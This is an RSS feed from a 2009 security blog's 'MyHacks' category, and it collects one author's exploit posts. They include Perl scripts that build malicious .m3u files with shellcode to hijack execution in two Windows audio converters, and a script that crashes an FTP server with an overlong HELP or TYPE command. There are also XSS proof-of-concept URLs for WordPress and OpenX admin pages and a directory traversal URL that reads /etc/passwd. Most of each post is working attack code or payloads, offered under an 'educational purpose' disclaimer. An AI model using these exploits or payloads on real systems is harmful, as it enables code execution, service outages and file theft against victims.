<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SecurityGyan &#187; MyHacks</title>
	<atom:link href="http://securitygyan.com/category/myhacks/feed/" rel="self" type="application/rss+xml" />
	<link>http://securitygyan.com</link>
	<description>World of information security</description>
	<lastBuildDate>Mon, 14 Dec 2009 10:00:35 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>RM Downloader (.M3U File) Stack Overflow exploit</title>
		<link>http://securitygyan.com/2009/12/14/rm-downloader-m3u-exploit/</link>
		<comments>http://securitygyan.com/2009/12/14/rm-downloader-m3u-exploit/#comments</comments>
		<pubDate>Mon, 14 Dec 2009 08:11:36 +0000</pubDate>
		<dc:creator>Vinod Sharma</dc:creator>
				<category><![CDATA[MyHacks]]></category>

		<guid isPermaLink="false">http://securitygyan.com/?p=94</guid>
		<description><![CDATA[This Vulnerability was discovered two months ago. I wrote this exploit to refine my exploit writing skills. #!/usr/bin/perl # ********************************************************* # * RM Downloader 3.0.2.1 (.M3U File) Stack Overflow exploit * # ********************************************************* # # Author: Vinod Sharma # Download : http://www.rm-to-mp3.net/downloads/RMDownloader.exe # Tested : Windows XP SP2 (En) # Thanks to exploit-db,packetstormsecurity and all [...]]]></description>
			<content:encoded><![CDATA[<p>This Vulnerability was discovered two months ago. I wrote this exploit to refine my exploit writing skills.</p>
<p>#!/usr/bin/perl<br />
# *********************************************************<br />
# *  RM Downloader 3.0.2.1 (.M3U File) Stack Overflow exploit   *<br />
# *********************************************************<br />
#<br />
# Author: Vinod Sharma<br />
# Download :  <a href="http://www.rm-to-mp3.net/downloads/RMDownloader.exe">http://www.rm-to-mp3.net/downloads/RMDownloader.exe</a><br />
# Tested : Windows XP SP2 (En)<br />
# Thanks to exploit-db,packetstormsecurity and all security folks<br />
# Published at exploit-db.com: <big><a href="http://www.exploit-db.com/exploits/10423">http://www.exploit-db.com/exploits/10423</a></big><br />
#Vulnerability discovered by CYBER-ZONE(http://www.exploit-db.com/exploits/8404)<br />
#::::::NOTE: This exploit is only for educational purpose. If you use it for any malicious activity then author will not bear any #::::responsibility.  </p>
<p>my $Header = &#8220;#EXTM3U\n&#8221;;<br />
my $eip= pack(&#8216;V&#8217;, 0x01be8b59);  # jmp esp from RDcodec02.dll<br />
my $nop= &#8220;\x90&#8243; x 256;<br />
my $nop2=&#8221;\x90&#8243; x 8;<br />
my $nop3=&#8221;\x90&#8243; x 100;</p>
<p>####Calc.exe#####<br />
$shellcode = $shellcode.<br />
&#8220;\x31\xc9\xda\xd4\xb1\x33\xbd\xec\x71\x94\xde\xd9\x74\x24\xf4&#8243;.<br />
&#8220;\x5f\x31\x6f\x15\x03\x6f\x15\x83\x2b\x75\x76\x2b\x4f\x9e\xff&#8221;.<br />
&#8220;\xd4\xaf\x5f\x60\x5c\x4a\x6e\xb2\x3a\x1f\xc3\x02\x48\x4d\xe8&#8243;.<br />
&#8220;\xe9\x1c\x65\x7b\x9f\x88\x8a\xcc\x2a\xef\xa5\xcd\x9a\x2f\x69&#8243;.<br />
&#8220;\x0d\xbc\xd3\x73\x42\x1e\xed\xbc\x97\x5f\x2a\xa0\x58\x0d\xe3&#8243;.<br />
&#8220;\xaf\xcb\xa2\x80\xed\xd7\xc3\x46\x7a\x67\xbc\xe3\xbc\x1c\x76&#8243;.<br />
&#8220;\xed\xec\x8d\x0d\xa5\x14\xa5\x4a\x16\x25\x6a\x89\x6a\x6c\x07&#8243;.<br />
&#8220;\x7a\x18\x6f\xc1\xb2\xe1\x5e\x2d\x18\xdc\x6f\xa0\x60\x18\x57&#8243;.<br />
&#8220;\x5b\x17\x52\xa4\xe6\x20\xa1\xd7\x3c\xa4\x34\x7f\xb6\x1e\x9d&#8221;.<br />
&#8220;\x7e\x1b\xf8\x56\x8c\xd0\x8e\x31\x90\xe7\x43\x4a\xac\x6c\x62&#8243;.<br />
&#8220;\x9d\x25\x36\x41\x39\x6e\xec\xe8\x18\xca\x43\x14\x7a\xb2\x3c&#8221;.<br />
&#8220;\xb0\xf0\x50\x28\xc2\x5a\x3e\xaf\x46\xe1\x07\xaf\x58\xea\x27&#8243;.<br />
&#8220;\xd8\x69\x61\xa8\x9f\x75\xa0\x8d\x40\x94\x61\xfb\xe8\x01\xe0&#8243;.<br />
&#8220;\x46\x75\xb2\xde\x84\x80\x31\xeb\x74\x77\x29\x9e\x71\x33\xed&#8221;.<br />
&#8220;\x72\x0b\x2c\x98\x74\xb8\x4d\x89\x16\x5f\xde\x51\xf7\xfa\x66&#8243;.<br />
&#8220;\xf3\x07&#8243;;</p>
<p>$ex=&#8221;http://F&#8221;.$nop.$eip.$nop2.$shellcode.&#8221;A&#8221; x 26280 ;</p>
<p>open(MYFILE,&#8217;>>exploit.m3u&#8217;);</p>
<p>print MYFILE $Header.$ex;</p>
<p>close(MYFILE);</p>
]]></content:encoded>
			<wfw:commentRss>http://securitygyan.com/2009/12/14/rm-downloader-m3u-exploit/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Easy RM to MP3 Converter 2.7.3.700 (.m3u) File WinXP SP2 Buffer Overflow Exploit</title>
		<link>http://securitygyan.com/2009/12/10/easyrmtomp3-m3ufile-exploit/</link>
		<comments>http://securitygyan.com/2009/12/10/easyrmtomp3-m3ufile-exploit/#comments</comments>
		<pubDate>Thu, 10 Dec 2009 21:39:03 +0000</pubDate>
		<dc:creator>Vinod Sharma</dc:creator>
				<category><![CDATA[MyHacks]]></category>

		<guid isPermaLink="false">http://securitygyan.com/?p=87</guid>
		<description><![CDATA[#Hi to all security folks. #This is my first exploit with embedded shellcode. I am dedicating this to my friend Praveen. #Thanks to him for motivating me to achieve this level. Thanks to all the security folks. #I know this is basic or 1st level stuff in exploit developers community but today i can confidently [...]]]></description>
			<content:encoded><![CDATA[<p>#Hi to all security folks.<br />
#This is my first exploit with embedded shellcode. I am dedicating this to my friend Praveen.<br />
#Thanks to him for motivating me to achieve this level. Thanks to all the security folks.<br />
#I know this is basic or 1st level stuff in exploit developers community but today i can confidently<br />
#say that i am one of them. I will continue to improve my skills to help the community.<br />
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$<br />
#$$$$$Author will not bare any responsibility for any damages whatsoever.$$$$$$$$$$$$$$<br />
#Just give it a shot you will see calc.exe. </p>
<p>#!/usr/bin/perl<br />
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File WinXP Sp2 Buffer Overflow Exploit<br />
# Author: Vinod Sharma<br />
#exploit published at: http://www.exploit-db.com/exploits/10374<br />
# Download :  http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe<br />
# Tested : Windows XP SP2 (En)<br />
# Thanks to exploit-db<br />
#Vulnerability discovered by CYBER-ZONE<br />
#Advisory:http://secunia.com/advisories/34653<br />
my $file= &#8220;exploit.m3u&#8221;;<br />
my $junk= &#8220;\x41&#8243; x 26059;<br />
my $eip= pack(&#8216;V&#8217;, 0x01a8f23a);<br />
my $shellcode= &#8220;\x90&#8243; x 25;</p>
<p>#/*<br />
 #* windows/exec &#8211; 223 bytes<br />
 #* http://www.metasploit.com<br />
 #* Encoder: x86/shikata_ga_nai<br />
 #* EXITFUNC=thread, CMD=calc<br />
 #*/<br />
$shellcode = $shellcode.<br />
&#8220;\x31\xc9\xda\xd4\xb1\x33\xbd\xec\x71\x94\xde\xd9\x74\x24\xf4&#8243;.<br />
&#8220;\x5f\x31\x6f\x15\x03\x6f\x15\x83\x2b\x75\x76\x2b\x4f\x9e\xff&#8221;.<br />
&#8220;\xd4\xaf\x5f\x60\x5c\x4a\x6e\xb2\x3a\x1f\xc3\x02\x48\x4d\xe8&#8243;.<br />
&#8220;\xe9\x1c\x65\x7b\x9f\x88\x8a\xcc\x2a\xef\xa5\xcd\x9a\x2f\x69&#8243;.<br />
&#8220;\x0d\xbc\xd3\x73\x42\x1e\xed\xbc\x97\x5f\x2a\xa0\x58\x0d\xe3&#8243;.<br />
&#8220;\xaf\xcb\xa2\x80\xed\xd7\xc3\x46\x7a\x67\xbc\xe3\xbc\x1c\x76&#8243;.<br />
&#8220;\xed\xec\x8d\x0d\xa5\x14\xa5\x4a\x16\x25\x6a\x89\x6a\x6c\x07&#8243;.<br />
&#8220;\x7a\x18\x6f\xc1\xb2\xe1\x5e\x2d\x18\xdc\x6f\xa0\x60\x18\x57&#8243;.<br />
&#8220;\x5b\x17\x52\xa4\xe6\x20\xa1\xd7\x3c\xa4\x34\x7f\xb6\x1e\x9d&#8221;.<br />
&#8220;\x7e\x1b\xf8\x56\x8c\xd0\x8e\x31\x90\xe7\x43\x4a\xac\x6c\x62&#8243;.<br />
&#8220;\x9d\x25\x36\x41\x39\x6e\xec\xe8\x18\xca\x43\x14\x7a\xb2\x3c&#8221;.<br />
&#8220;\xb0\xf0\x50\x28\xc2\x5a\x3e\xaf\x46\xe1\x07\xaf\x58\xea\x27&#8243;.<br />
&#8220;\xd8\x69\x61\xa8\x9f\x75\xa0\x8d\x40\x94\x61\xfb\xe8\x01\xe0&#8243;.<br />
&#8220;\x46\x75\xb2\xde\x84\x80\x31\xeb\x74\x77\x29\x9e\x71\x33\xed&#8221;.<br />
&#8220;\x72\x0b\x2c\x98\x74\xb8\x4d\x89\x16\x5f\xde\x51\xf7\xfa\x66&#8243;.<br />
&#8220;\xf3\x07&#8243;;</p>
<p>$shellcode = $shellcode.&#8221;\x90&#8243; x 25;<br />
open($FILE, &#8220;>$file&#8221;);<br />
print($FILE $junk.$eip.$shellcode);<br />
close($FILE);<br />
print(&#8220;exploit created successfully&#8221;);</p>
]]></content:encoded>
			<wfw:commentRss>http://securitygyan.com/2009/12/10/easyrmtomp3-m3ufile-exploit/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit</title>
		<link>http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/</link>
		<comments>http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/#comments</comments>
		<pubDate>Tue, 09 Jun 2009 08:07:25 +0000</pubDate>
		<dc:creator>Vinod Sharma</dc:creator>
				<category><![CDATA[MyHacks]]></category>

		<guid isPermaLink="false">http://securitygyan.com/?p=72</guid>
		<description><![CDATA[#!usr/bin/perl -w #################################################################### # XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service # via a &#8220;HELP&#8221; or &#8220;TYPE&#8221; command with an overly long argument. # Refer: # http://secunia.com/advisories/35271/ #http://downloads.securityfocus.com/vulnerabilities/exploits/35239-2.pl # # Product link: http://www.dxm2008.com/ # Vunerbility discovered by: NeerajT of Nevis Labs #http://hypersecurity.blogspot.com/2009/06/xm-personal-ftp-server-vulnerability.html # #$$$$$This was strictly written [...]]]></description>
			<content:encoded><![CDATA[<p>#!usr/bin/perl -w</p>
<p>####################################################################<br />
#   XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service<br />
#   via a &#8220;HELP&#8221; or &#8220;TYPE&#8221; command with an overly long argument.<br />
#   Refer:<br />
#        												http://secunia.com/advisories/35271/<br />
#http://downloads.securityfocus.com/vulnerabilities/exploits/35239-2.pl<br />
#<br />
#		  Product link:	http://www.dxm2008.com/<br />
#         Vunerbility discovered by: NeerajT of Nevis Labs<br />
#http://hypersecurity.blogspot.com/2009/06/xm-personal-ftp-server-vulnerability.html</p>
<p>#<br />
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$<br />
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$<br />
#<br />
#        Author:    Vinod Sharma<br />
#        Email:     vinodsharma[underscore]mimit[at]gmail.com<br />
#        Blog:       http://securitygyan.com/<br />
#        Date:      09th june, 2009<br />
#<br />
#<br />
###Thanks to all the Security Folks###<br />
###################################################################</p>
<p>use IO::Socket;</p>
<p>my $server_ip=$ARGV[0];<br />
my $server_port=$ARGV[1];<br />
my $username=$ARGV[2];<br />
my $password=$ARGV[3];<br />
my $command=$ARGV[4];<br />
my $buffer=$command .&#8221; &#8221; .&#8221;\x41&#8243; x 10000 .&#8221;\r\n&#8221;;          </p>
<p>if(($#ARGV + 1)!=5)<br />
{<br />
				print &#8220;\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n&#8221;;<br />
				print &#8220;\nargument command can have a value HELP or TYPE\n&#8221;;<br />
				print &#8220;\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP&#8221;;</p>
<p>				exit;<br />
}</p>
<p>$socket = new IO::Socket::INET (PeerAddr  =>$server_ip,  PeerPort  => $server_port, Proto => &#8216;tcp&#8217;, )   or die &#8220;Couldn&#8217;t connect to Server\n&#8221;;</p>
<p>while (1)<br />
{</p>
<p>    $socket->recv($recv_data,1024);<br />
    print &#8220;RECIEVED: $recv_data&#8221;; </p>
<p>	$send_data1 =&#8221;USER &#8220;.$username.&#8221;\r\n&#8221;;<br />
    $socket->send($send_data1);<br />
    $socket->recv($recv_data1,1024);<br />
    print &#8220;RECIEVED: $recv_data1&#8243;; </p>
<p>	   $send_data2 =&#8221;PASS &#8220;.$password.&#8221;\r\n&#8221;;<br />
       $socket->send($send_data2);<br />
	   $socket->recv($recv_data2,1024);<br />
        print &#8220;RECIEVED: $recv_data2&#8243;; </p>
<p>       $socket->send($buffer);<br />
	   print &#8220;\nAttack is send&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;\n&#8221;;<br />
	   $socket->recv($recv_data3,1024);<br />
        print &#8220;RECIEVED: $recv_data3&#8243;; </p>
<p>		close $socket;</p>
<p>  }<br />
 <img src="http://securitygyan.com/wp-content/uploads/2009/06/xm_easy_personal-1024x819.jpg" alt="xm_easy_personal" title="xm_easy_personal" width="700" height="500" class="alignnone size-large wp-image-75" /></p>
]]></content:encoded>
			<wfw:commentRss>http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Worpress 2.7.1 wp-comments-post.php XSS exploit</title>
		<link>http://securitygyan.com/2009/05/03/worpress-271-wp-comments-postphp-xss-exploit/</link>
		<comments>http://securitygyan.com/2009/05/03/worpress-271-wp-comments-postphp-xss-exploit/#comments</comments>
		<pubDate>Sun, 03 May 2009 19:10:36 +0000</pubDate>
		<dc:creator>Vinod Sharma</dc:creator>
				<category><![CDATA[MyHacks]]></category>

		<guid isPermaLink="false">http://securitygyan.com/?p=56</guid>
		<description><![CDATA[XSS vulnerability exists in wp-comments-post.php file while submitting a comment form to this php script. Step1:Insert XSS paylod into comment form and submit it. payload: alert(String.fromCharCode(88,83,83)) Note:remove # character from starting script tag in payload to reproduce this vulnerability. Step2: When other user view the infected page, it will result in exploitation. Severity is low [...]]]></description>
			<content:encoded><![CDATA[<p>XSS vulnerability exists in wp-comments-post.php file while submitting a comment form to this php script.</p>
<p>Step1:Insert XSS paylod into comment form and submit it.</p>
<p>         payload: <#script>alert(String.fromCharCode(88,83,83))</script></p>
<p> <strong>Note:remove # character from starting script tag in payload to reproduce this vulnerability.</strong></p>
<p>Step2: When other user view the infected page, it will result in exploitation.</p>
<p><img src="http://securitygyan.com/wp-content/uploads/2009/05/wp_xss_poc.jpg" alt="wp_xss_poc" title="wp_xss_poc" width="466" height="595" class="alignnone size-full wp-image-57" /></p>
<p> Severity is low because only a registered user can exploit this issue. </p>
]]></content:encoded>
			<wfw:commentRss>http://securitygyan.com/2009/05/03/worpress-271-wp-comments-postphp-xss-exploit/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>OpenX 2.6.3 orderdirection and listorder parameter XSS Exploits</title>
		<link>http://securitygyan.com/2009/05/03/openx-263-orderdirection-and-listorder-parameter-xss-exploits/</link>
		<comments>http://securitygyan.com/2009/05/03/openx-263-orderdirection-and-listorder-parameter-xss-exploits/#comments</comments>
		<pubDate>Sun, 03 May 2009 07:06:42 +0000</pubDate>
		<dc:creator>Vinod Sharma</dc:creator>
				<category><![CDATA[MyHacks]]></category>

		<guid isPermaLink="false">http://securitygyan.com/?p=31</guid>
		<description><![CDATA[############################################################################### OpenX 2.6.3 orderdirection and listorder parameter XSS Vulnerability Input passed to the &#8220;orderdirection&#8221; and &#8220;listorder&#8221; parameters in &#8220;www/admin/userlog-index.php&#8221; and &#8220;www/admin/stats.php&#8221; is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user&#8217;s browser session in the context of an affected site. Vulnerability [...]]]></description>
			<content:encoded><![CDATA[<p>###############################################################################</p>
<p>OpenX 2.6.3 orderdirection and listorder parameter XSS Vulnerability 		 </p>
<p>Input passed to the &#8220;orderdirection&#8221; and &#8220;listorder&#8221; parameters in<br />
&#8220;www/admin/userlog-index.php&#8221; and &#8220;www/admin/stats.php&#8221; is not<br />
properly sanitised before being returned to the user. This can be<br />
exploited to execute arbitrary HTML and script code in a user&#8217;s<br />
browser session in the context of an affected site.				 </p>
<p>Vulnerability fixed in 2.6.4			 				 </p>
<p>http://www.openx.org/ad-server/download</p>
<p>Published at:<a href="http://www.packetstormsecurity.org/0902-exploits/openxorderdir-xss.rar">http://www.packetstormsecurity.org/0902-exploits/openxorderdir-xss.rar</a><br />
###############################################################################</p>
<p>exploit1:<br />
filename:www/admin/userlog-index.php<br />
parameter:listorder</p>
<p>POC:</p>
<p>http://172.16.4.113/openx-2.6.3/www/admin/userlog-index.php?listorder=updated&#8217;;<#script>alert(String.fromCharCode(88,83,83))</script>&#038;orderdirection=down</p>
<p>exploit2:<br />
filename:www/admin/userlog-index.php<br />
parameter:orderdirection</p>
<p>POC:</p>
<p>http://172.16.4.113/openx-2.6.3/www/admin/userlog-index.php?listorder=updated&#038;orderdirection=down';<#script>alert(String.fromCharCode(88,83,83))</script></p>
<p>exploit3:<br />
filename:www/admin/stats.php<br />
parameter:listorder</p>
<p>POC:</p>
<p>http://172.16.4.113/openx-2.6.3/www/admin/stats.php?statsBreakdown=day&#038;listorder=name';<#script>alert(String.fromCharCode(88,83,83))</script>&#038;orderdirection=up&#038;day=&#038;setPerPage=15&#038;entity=global&#038;breakdown=history&#038;period_preset=all_stats&#038;period_start=&#038;period_end=</p>
<p>exploit4:<br />
filename:www/admin/stats.php<br />
parameter:orderdirection</p>
<p>POC:</p>
<p>http://172.16.4.113/openx-2.6.3/www/admin/stats.php?statsBreakdown=day&#038;listorder=name&#038;orderdirection=up';<#script>alert(String.fromCharCode(88,83,83))</script>&#038;day=&#038;setPerPage=15&#038;entity=global&#038;breakdown=history&#038;period_preset=all_stats&#038;period_start=&#038;period_end=</p>
<p><strong>Note:remove # character from starting script tag in all pocs to reproduce this vulnerability. </strong></p>
<p>###############################################################################</p>
]]></content:encoded>
			<wfw:commentRss>http://securitygyan.com/2009/05/03/openx-263-orderdirection-and-listorder-parameter-xss-exploits/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>OpenX 2.6.3 clientid parameter XSS Exploits</title>
		<link>http://securitygyan.com/2009/05/03/openx-263-clientid-parameter-xss-exploits/</link>
		<comments>http://securitygyan.com/2009/05/03/openx-263-clientid-parameter-xss-exploits/#comments</comments>
		<pubDate>Sun, 03 May 2009 06:53:12 +0000</pubDate>
		<dc:creator>Vinod Sharma</dc:creator>
				<category><![CDATA[MyHacks]]></category>

		<guid isPermaLink="false">http://securitygyan.com/?p=24</guid>
		<description><![CDATA[############################################################################### OpenX 2.6.3 clientid parameter XSS Vulnerability Input passed to the &#8220;clientid&#8221; parameter in &#8220;www/admin/banner- acl.php&#8221;, &#8220;www/admin/banner-edit.php&#8221;, &#8220;www/admin/campaign-zone.php&#8221;, &#8220;www/admin/advertiser-campaigns.php&#8221;, &#8220;www/admin/campaign- banners.php&#8221;, and &#8220;www/admin/banner-activate.php&#8221; is not properly sanitised before being returned to the user. Vulnerability fixed in 2.6.4 http://www.openx.org/ad-server/download parameter:clientid published at: http://www.packetstormsecurity.org/0902-exploits/openxclient-xss.rar ############################################################################### exploit1: filename:www/admin/banner-acl.php POC: http://172.16.4.113/openx-2.6.3/www/admin/banner-acl.php?clientid=1&#8242;;alert(String.fromCharCode(88,83,83))&#038;campaignid=1&#038;bannerid=1 exploit2: filename:www/admin/banner-edit.php POC: http://172.16.4.113/openx-2.6.3/www/admin/banner-edit.php?clientid=1';alert(String.fromCharCode(88,83,83))&#038;campaignid=1&#038;bannerid=1 exploit3: filename:www/admin/campaign-zone.php POC: http://172.16.4.113/openx-2.6.3/www/admin/campaign-zone.php?clientid=1';alert(String.fromCharCode(88,83,83))&#038;campaignid=1 [...]]]></description>
			<content:encoded><![CDATA[<p>###############################################################################</p>
<p>OpenX 2.6.3 clientid parameter XSS Vulnerability 				 </p>
<p>Input passed to the &#8220;clientid&#8221; parameter in &#8220;www/admin/banner-<br />
acl.php&#8221;, &#8220;www/admin/banner-edit.php&#8221;, &#8220;www/admin/campaign-zone.php&#8221;,<br />
&#8220;www/admin/advertiser-campaigns.php&#8221;, &#8220;www/admin/campaign-<br />
banners.php&#8221;, and &#8220;www/admin/banner-activate.php&#8221; is not properly<br />
sanitised before being returned to the user. 					 </p>
<p>Vulnerability fixed in 2.6.4							 </p>
<p>http://www.openx.org/ad-server/download</p>
<p>parameter:clientid								 </p>
<p>published at: <a href="http://www.packetstormsecurity.org/0902-exploits/openxclient-xss.rar">http://www.packetstormsecurity.org/0902-exploits/openxclient-xss.rar</a><br />
###############################################################################</p>
<p>exploit1:<br />
filename:www/admin/banner-acl.php</p>
<p>POC:</p>
<p>http://172.16.4.113/openx-2.6.3/www/admin/banner-acl.php?clientid=1&#8242;;<#script>alert(String.fromCharCode(88,83,83))</script>&#038;campaignid=1&#038;bannerid=1</p>
<p>exploit2:<br />
filename:www/admin/banner-edit.php</p>
<p>POC:</p>
<p>http://172.16.4.113/openx-2.6.3/www/admin/banner-edit.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))</script>&#038;campaignid=1&#038;bannerid=1</p>
<p>exploit3:<br />
filename:www/admin/campaign-zone.php</p>
<p>POC:</p>
<p>http://172.16.4.113/openx-2.6.3/www/admin/campaign-zone.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))</script>&#038;campaignid=1</p>
<p>exploit4:<br />
filename:www/admin/advertiser-campaigns.php</p>
<p>POC:</p>
<p>http://172.16.4.113/openx-2.6.3/www/admin/advertiser-campaigns.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))</script></p>
<p>exploit5:<br />
filename:www/admin/campaign-banners.php</p>
<p>POC:</p>
<p>http://172.16.4.113/openx-2.6.3/www/admin/campaign-banners.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))</script>&#038;campaignid=1</p>
<p>exploit6:<br />
filename:www/admin/banner-activate.php</p>
<p>POC:</p>
<p>http://172.16.4.113/openx-2.6.3/www/admin/banner-activate.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))</script>&#038;campaignid=1&#038;bannerid=1&#038;value=0</p>
<p><strong>Note:remove # character from starting script tag in all pocs to reproduce this vulnerability. </strong><br />
###############################################################################</p>
]]></content:encoded>
			<wfw:commentRss>http://securitygyan.com/2009/05/03/openx-263-clientid-parameter-xss-exploits/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>MySqlQuickAdmin Directory Traversal Exploit</title>
		<link>http://securitygyan.com/2009/05/03/mysqlquickadmin-directory-traversal-exploit/</link>
		<comments>http://securitygyan.com/2009/05/03/mysqlquickadmin-directory-traversal-exploit/#comments</comments>
		<pubDate>Sun, 03 May 2009 06:38:41 +0000</pubDate>
		<dc:creator>Vinod Sharma</dc:creator>
				<category><![CDATA[MyHacks]]></category>

		<guid isPermaLink="false">http://securitygyan.com/?p=16</guid>
		<description><![CDATA[############################################################################### Directory traversal vulnerability in MySQL Quick Admin 1.5.5 allows remote attackers to read and execute arbitrary files via a .. (dot dot) in the lang parameter to actions.php. published at milworm :http://www.milw0rm.com/exploits/7020 ############################################################################### POC:http://www.example.com/quickadmin/actions.php?act=27&#38;do=lang?=../../../../../../../../../../etc/passwd%00 ############################################################################### references: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454 http://secunia.com/advisories/31820 ############################################################################### # milw0rm.com [2008-11-06]]]></description>
			<content:encoded><![CDATA[<p>###############################################################################<br />
Directory traversal vulnerability in MySQL Quick Admin 1.5.5 allows remote attackers to read and execute arbitrary files via a .. (dot dot)<br />
in the lang parameter to actions.php.							</p>
<p>published at milworm :http://www.milw0rm.com/exploits/7020</p>
<p>###############################################################################</p>
<p>POC:http://www.example.com/quickadmin/actions.php?act=27&amp;do=lang?=../../../../../../../../../../etc/passwd%00</p>
<p>###############################################################################<br />
references:									</p>
<p>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454</p>
<p>http://secunia.com/advisories/31820</p>
<p>###############################################################################</p>
<p># milw0rm.com [2008-11-06]</p>
]]></content:encoded>
			<wfw:commentRss>http://securitygyan.com/2009/05/03/mysqlquickadmin-directory-traversal-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

